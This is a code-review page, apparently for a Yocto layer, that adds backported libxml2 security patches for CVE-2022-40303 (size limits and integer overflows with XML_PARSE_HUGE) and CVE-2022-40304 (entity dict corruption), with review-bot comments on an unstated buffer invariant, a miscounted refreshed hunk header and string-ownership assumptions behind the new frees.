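Review bot: The rewritten bounds tests (`len < buf->size - buf->use` in xmlBufGrowInternal and xmlBufferGrow, `len >= buf->size - buf->use` in xmlBufAdd and xmlBufferAdd) are only overflow-safe while `use <= size` holds; if that invariant is ever broken the unsigned subtraction wraps and the "enough room" branch is taken. Nothing in these hunks establishes the invariant, so a comment at each site, e.g. `/* relies on buf->use <= buf->size */`, would record the assumption for the next refresh. Separately, the two `newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;` lines in xmlBufferResize end in a doubled semicolon. xmlBufCCat and xmlBufferCCat now forward to xmlBufCat and xmlBufferCat, whose return codes are outside the hunks, so callers that tested for XML_ERR_NO_MEMORY from the old loops should be re-checked.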
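--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch
@@ -0,0 +1,623 @@
+From c846986356fc149915a74972bf198abc266bc2c0 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 25 Aug 2022 17:43:08 +0200
+Subject: [PATCH] [CVE-2022-40303] Fix integer overflows with XML_PARSE_HUGE
+
+Also impose size limits when XML_PARSE_HUGE is set. Limit size of names
+to XML_MAX_TEXT_LENGTH (10 million bytes) and other content to
+XML_MAX_HUGE_LENGTH (1 billion bytes).
+
+Move some the length checks to the end of the respective loop to make
+them strict.
+
+xmlParseEntityValue didn't have a length limitation at all. But without
+XML_PARSE_HUGE, this should eventually trigger an error in xmlGROW.
+
+Thanks to Maddie Stone working with Google Project Zero for the report!
+
+CVE: CVE-2022-40303
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0]
+Comments: Refreshed hunk
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ parser.c | 233 +++++++++++++++++++++++++++++--------------------------
+ 1 file changed, 121 insertions(+), 112 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 93f031be..79479979 100644
+--- a/parser.c
++++ b/parser.c
+@@ -102,6 +102,8 @@ xmlParseElementEnd(xmlParserCtxtPtr ctxt);
+ * *
+ ************************************************************************/
+
++#define XML_MAX_HUGE_LENGTH 1000000000
++
+ #define XML_PARSER_BIG_ENTITY 1000
+ #define XML_PARSER_LOT_ENTITY 5000
+
+@@ -552,7 +554,7 @@ xmlFatalErr(xmlParserCtxtPtr ctxt, xmlParserErrors error, const char *info)
+ errmsg = "Malformed declaration expecting version";
+ break;
+ case XML_ERR_NAME_TOO_LONG:
+- errmsg = "Name too long use XML_PARSE_HUGE option";
++ errmsg = "Name too long";
+ break;
+ #if 0
+ case:
+@@ -3202,6 +3204,9 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNameComplex++;
+@@ -3267,7 +3272,8 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ }
+@@ -3293,13 +3299,13 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+ return(NULL);
+ }
+@@ -3338,7 +3344,10 @@ const xmlChar *
+ xmlParseName(xmlParserCtxtPtr ctxt) {
+ const xmlChar *in;
+ const xmlChar *ret;
+- int count = 0;
++ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ GROW;
+
+@@ -3362,8 +3371,7 @@ xmlParseName(xmlParserCtxtPtr ctxt) {
+ in++;
+ if ((*in > 0) && (*in < 0x80)) {
+ count = in - ctxt->input->cur;
+- if ((count > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (count > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+ return(NULL);
+ }
+@@ -3384,6 +3392,9 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ size_t startPosition = 0;
+
+ #ifdef DEBUG
+@@ -3404,17 +3415,13 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ while ((c != ' ') && (c != '>') && (c != '/') && /* test bigname.xml */
+ (xmlIsNameChar(ctxt, c) && (c != ':'))) {
+ if (count++ > XML_PARSER_CHUNK_SIZE) {
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+- return(NULL);
+- }
+ count = 0;
+ GROW;
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ if (c == 0) {
+@@ -3432,8 +3439,7 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ c = CUR_CHAR(l);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3459,7 +3465,10 @@ static const xmlChar *
+ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+ const xmlChar *in, *e;
+ const xmlChar *ret;
+- int count = 0;
++ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNCName++;
+@@ -3484,8 +3493,7 @@ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+ goto complex;
+ if ((*in > 0) && (*in < 0x80)) {
+ count = in - ctxt->input->cur;
+- if ((count > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (count > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3567,6 +3575,9 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ const xmlChar *cur = *str;
+ int len = 0, l;
+ int c;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseStringName++;
+@@ -3602,12 +3613,6 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ if (len + 10 > max) {
+ xmlChar *tmp;
+
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+- xmlFree(buffer);
+- return(NULL);
+- }
+ max *= 2;
+ tmp = (xmlChar *) xmlRealloc(buffer,
+ max * sizeof(xmlChar));
+@@ -3621,14 +3626,18 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ COPY_BUF(l,buffer,len,c);
+ cur += l;
+ c = CUR_SCHAR(cur, l);
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
++ xmlFree(buffer);
++ return(NULL);
++ }
+ }
+ buffer[len] = 0;
+ *str = cur;
+ return(buffer);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3655,6 +3664,9 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNmToken++;
+@@ -3706,12 +3718,6 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ if (len + 10 > max) {
+ xmlChar *tmp;
+
+- if ((max > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+- xmlFree(buffer);
+- return(NULL);
+- }
+ max *= 2;
+ tmp = (xmlChar *) xmlRealloc(buffer,
+ max * sizeof(xmlChar));
+@@ -3725,6 +3731,11 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ COPY_BUF(l,buffer,len,c);
+ NEXTL(l);
+ c = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
++ xmlFree(buffer);
++ return(NULL);
++ }
+ }
+ buffer[len] = 0;
+ return(buffer);
+@@ -3732,8 +3743,7 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ }
+ if (len == 0)
+ return(NULL);
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+ return(NULL);
+ }
+@@ -3759,6 +3769,9 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
+ int c, l;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ xmlChar stop;
+ xmlChar *ret = NULL;
+ const xmlChar *cur = NULL;
+@@ -3818,6 +3831,12 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+ GROW;
+ c = CUR_CHAR(l);
+ }
++
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_ENTITY_NOT_FINISHED,
++ "entity value too long\n");
++ goto error;
++ }
+ }
+ buf[len] = 0;
+ if (ctxt->instate == XML_PARSER_EOF)
+@@ -3905,6 +3924,9 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ xmlChar *rep = NULL;
+ size_t len = 0;
+ size_t buf_size = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int c, l, in_space = 0;
+ xmlChar *current = NULL;
+ xmlEntityPtr ent;
+@@ -3925,16 +3925,6 @@
+ while (((NXT(0) != limit) && /* checked */
+ (IS_CHAR(c)) && (c != '<')) &&
+ (ctxt->instate != XML_PARSER_EOF)) {
+- /*
+- * Impose a reasonable limit on attribute size, unless XML_PARSE_HUGE
+- * special option is given
+- */
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+- "AttValue length too long\n");
+- goto mem_error;
+- }
+ if (c == 0) break;
+ if (c == '&') {
+ in_space = 0;
+@@ -4093,6 +4105,11 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ }
+ GROW;
+ c = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
++ "AttValue length too long\n");
++ goto mem_error;
++ }
+ }
+ if (ctxt->instate == XML_PARSER_EOF)
+ goto error;
+@@ -4114,16 +4131,6 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ } else
+ NEXT;
+
+- /*
+- * There we potentially risk an overflow, don't allow attribute value of
+- * length more than INT_MAX it is a very reasonable assumption !
+- */
+- if (len >= INT_MAX) {
+- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+- "AttValue length too long\n");
+- goto mem_error;
+- }
+-
+ if (attlen != NULL) *attlen = (int) len;
+ return(buf);
+
+@@ -4194,6 +4201,9 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
+ int cur, l;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ xmlChar stop;
+ int state = ctxt->instate;
+ int count = 0;
+@@ -4221,13 +4231,6 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ if (len + 5 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
+- xmlFree(buf);
+- ctxt->instate = (xmlParserInputState) state;
+- return(NULL);
+- }
+ size *= 2;
+ tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ if (tmp == NULL) {
+@@ -4256,6 +4259,12 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ SHRINK;
+ cur = CUR_CHAR(l);
+ }
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
++ xmlFree(buf);
++ ctxt->instate = (xmlParserInputState) state;
++ return(NULL);
++ }
+ }
+ buf[len] = 0;
+ ctxt->instate = (xmlParserInputState) state;
+@@ -4283,6 +4292,9 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ xmlChar cur;
+ xmlChar stop;
+ int count = 0;
+@@ -4310,12 +4322,6 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ if (len + 1 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
+- xmlFree(buf);
+- return(NULL);
+- }
+ size *= 2;
+ tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ if (tmp == NULL) {
+@@ -4343,6 +4349,11 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ SHRINK;
+ cur = CUR;
+ }
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
++ xmlFree(buf);
++ return(NULL);
++ }
+ }
+ buf[len] = 0;
+ if (cur != stop) {
+@@ -4742,6 +4753,9 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ int r, rl;
+ int cur, l;
+ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int inputid;
+
+ inputid = ctxt->input->id;
+@@ -4787,13 +4801,6 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ if ((r == '-') && (q == '-')) {
+ xmlFatalErr(ctxt, XML_ERR_HYPHEN_IN_COMMENT, NULL);
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+- "Comment too big found", NULL);
+- xmlFree (buf);
+- return;
+- }
+ if (len + 5 >= size) {
+ xmlChar *new_buf;
+ size_t new_size;
+@@ -4831,6 +4838,13 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ GROW;
+ cur = CUR_CHAR(l);
+ }
++
++ if (len > maxLength) {
++ xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
++ "Comment too big found", NULL);
++ xmlFree (buf);
++ return;
++ }
+ }
+ buf[len] = 0;
+ if (cur == 0) {
+@@ -4875,6 +4889,9 @@ xmlParseComment(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ size_t size = XML_PARSER_BUFFER_SIZE;
+ size_t len = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ xmlParserInputState state;
+ const xmlChar *in;
+ size_t nbchar = 0;
+@@ -4958,8 +4975,7 @@ get_more:
+ buf[len] = 0;
+ }
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+ "Comment too big found", NULL);
+ xmlFree (buf);
+@@ -5159,6 +5175,9 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ size_t len = 0;
+ size_t size = XML_PARSER_BUFFER_SIZE;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int cur, l;
+ const xmlChar *target;
+ xmlParserInputState state;
+@@ -5234,14 +5253,6 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ return;
+ }
+ count = 0;
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+- "PI %s too big found", target);
+- xmlFree(buf);
+- ctxt->instate = state;
+- return;
+- }
+ }
+ COPY_BUF(l,buf,len,cur);
+ NEXTL(l);
+@@ -5251,15 +5262,14 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ GROW;
+ cur = CUR_CHAR(l);
+ }
++ if (len > maxLength) {
++ xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
++ "PI %s too big found", target);
++ xmlFree(buf);
++ ctxt->instate = state;
++ return;
++ }
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+- "PI %s too big found", target);
+- xmlFree(buf);
+- ctxt->instate = state;
+- return;
+- }
+ buf[len] = 0;
+ if (cur != '?') {
+ xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+@@ -8954,6 +8964,9 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ const xmlChar *in = NULL, *start, *end, *last;
+ xmlChar *ret = NULL;
+ int line, col;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+
+ GROW;
+ in = (xmlChar *) CUR_PTR;
+@@ -8993,8 +9006,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ start = in;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9007,8 +9019,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ if ((*in++ == 0x20) && (*in == 0x20)) break;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9041,16 +9052,14 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ last = last + delta;
+ }
+ end = ctxt->input->end;
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+ }
+ }
+ }
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9063,8 +9072,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ col++;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9072,8 +9080,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ }
+ }
+ last = in;
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9763,6 +9770,9 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ int s, sl;
+ int cur, l;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+
+ /* Check 2.6.0 was NXT(0) not RAW */
+ if (CMP9(CUR_PTR, '<', '!', '[', 'C', 'D', 'A', 'T', 'A', '[')) {
+@@ -9796,13 +9806,6 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ if (len + 5 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_CDATA_NOT_FINISHED,
+- "CData section too big found", NULL);
+- xmlFree (buf);
+- return;
+- }
+ tmp = (xmlChar *) xmlRealloc(buf, size * 2 * sizeof(xmlChar));
+ if (tmp == NULL) {
+ xmlFree(buf);
+@@ -9829,6 +9832,12 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ }
+ NEXTL(l);
+ cur = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_CDATA_NOT_FINISHED,
++ "CData section too big found\n");
++ xmlFree(buf);
++ return;
++ }
+ }
+ buf[len] = 0;
+ ctxt->instate = XML_PARSER_CONTENT;
+--
+GitLab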
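Review bot: The refreshed hunk `@@ -3925,16 +3925,6 @@` in xmlParseAttValueComplex carries a new-side start that does not fit its neighbours, and it has lost its function context. The hunk before it is `-3905,6 +3924,9` (offset +22 afterwards) and the one after it is `-4093,6 +4105,11` (offset +12), so the header would be expected to read `@@ -3925,16 +3947,6 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {`. Patch tools will probably still place it by context, but a hand-edited header in a security backport makes it harder to confirm that the removed early length check and the new end-of-loop `len > maxLength` check sit in the same loop; regenerating the file from a git tree would settle that. The `Comments: Refreshed hunk` line could also say which hunk was touched.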
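--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
@@ -0,0 +1,104 @@
+From 1b41ec4e9433b05bb0376be4725804c54ef1d80b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 31 Aug 2022 22:11:25 +0200
+Subject: [PATCH] [CVE-2022-40304] Fix dict corruption caused by entity
+ reference cycles
+
+When an entity reference cycle is detected, the entity content is
+cleared by setting its first byte to zero. But the entity content might
+be allocated from a dict. In this case, the dict entry becomes corrupted
+leading to all kinds of logic errors, including memory errors like
+double-frees.
+
+Stop storing entity content, orig, ExternalID and SystemID in a dict.
+These values are unlikely to occur multiple times in a document, so they
+shouldn't have been stored in a dict in the first place.
+
+Thanks to Ned Williamson and Nathan Wachholz working with Google Project
+Zero for the report!
+
+CVE: CVE-2022-40304
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b]
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ entities.c | 55 ++++++++++++++++--------------------------------------
+ 1 file changed, 16 insertions(+), 39 deletions(-)
+
+diff --git a/entities.c b/entities.c
+index 84435515..d4e5412e 100644
+--- a/entities.c
++++ b/entities.c
+@@ -128,36 +128,19 @@ xmlFreeEntity(xmlEntityPtr entity)
+ if ((entity->children) && (entity->owner == 1) &&
+ (entity == (xmlEntityPtr) entity->children->parent))
+ xmlFreeNodeList(entity->children);
+- if (dict != NULL) {
+- if ((entity->name != NULL) && (!xmlDictOwns(dict, entity->name)))
+- xmlFree((char *) entity->name);
+- if ((entity->ExternalID != NULL) &&
+- (!xmlDictOwns(dict, entity->ExternalID)))
+- xmlFree((char *) entity->ExternalID);
+- if ((entity->SystemID != NULL) &&
+- (!xmlDictOwns(dict, entity->SystemID)))
+- xmlFree((char *) entity->SystemID);
+- if ((entity->URI != NULL) && (!xmlDictOwns(dict, entity->URI)))
+- xmlFree((char *) entity->URI);
+- if ((entity->content != NULL)
+- && (!xmlDictOwns(dict, entity->content)))
+- xmlFree((char *) entity->content);
+- if ((entity->orig != NULL) && (!xmlDictOwns(dict, entity->orig)))
+- xmlFree((char *) entity->orig);
+- } else {
+- if (entity->name != NULL)
+- xmlFree((char *) entity->name);
+- if (entity->ExternalID != NULL)
+- xmlFree((char *) entity->ExternalID);
+- if (entity->SystemID != NULL)
+- xmlFree((char *) entity->SystemID);
+- if (entity->URI != NULL)
+- xmlFree((char *) entity->URI);
+- if (entity->content != NULL)
+- xmlFree((char *) entity->content);
+- if (entity->orig != NULL)
+- xmlFree((char *) entity->orig);
+- }
++ if ((entity->name != NULL) &&
++ ((dict == NULL) || (!xmlDictOwns(dict, entity->name))))
++ xmlFree((char *) entity->name);
++ if (entity->ExternalID != NULL)
++ xmlFree((char *) entity->ExternalID);
++ if (entity->SystemID != NULL)
++ xmlFree((char *) entity->SystemID);
++ if (entity->URI != NULL)
++ xmlFree((char *) entity->URI);
++ if (entity->content != NULL)
++ xmlFree((char *) entity->content);
++ if (entity->orig != NULL)
++ xmlFree((char *) entity->orig);
+ xmlFree(entity);
+ }
+
+@@ -193,18 +176,12 @@ xmlCreateEntity(xmlDictPtr dict, const xmlChar *name, int type,
+ ret->SystemID = xmlStrdup(SystemID);
+ } else {
+ ret->name = xmlDictLookup(dict, name, -1);
+- if (ExternalID != NULL)
+- ret->ExternalID = xmlDictLookup(dict, ExternalID, -1);
+- if (SystemID != NULL)
+- ret->SystemID = xmlDictLookup(dict, SystemID, -1);
++ ret->ExternalID = xmlStrdup(ExternalID);
++ ret->SystemID = xmlStrdup(SystemID);
+ }
+ if (content != NULL) {
+ ret->length = xmlStrlen(content);
+- if ((dict != NULL) && (ret->length < 5))
+- ret->content = (xmlChar *)
+- xmlDictLookup(dict, content, ret->length);
+- else
+- ret->content = xmlStrndup(content, ret->length);
++ ret->content = xmlStrndup(content, ret->length);
+ } else {
+ ret->length = 0;
+ ret->content = NULL;
+--
+GitLab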
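Review bot: xmlFreeEntity now calls xmlFree() on ExternalID, SystemID, URI, content and orig without the xmlDictOwns() test, which is only safe if nothing in the backport target still stores a dict-owned string in those fields. The second hunk fixes the one producer it shows, xmlCreateEntity, for ExternalID, SystemID and content, but URI also loses its ownership test although neither the description nor the visible lines change how it is assigned. The patch touches entities.c only, so assignments elsewhere need checking against this older tree rather than upstream; that cannot be confirmed from this page. I would record the invariant next to the frees, for example `/* only name may be dict-owned; all other strings are heap-allocated */`. xmlCreateEntity starts and ends outside its hunk.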
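--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
@@ -0,0 +1,79 @@
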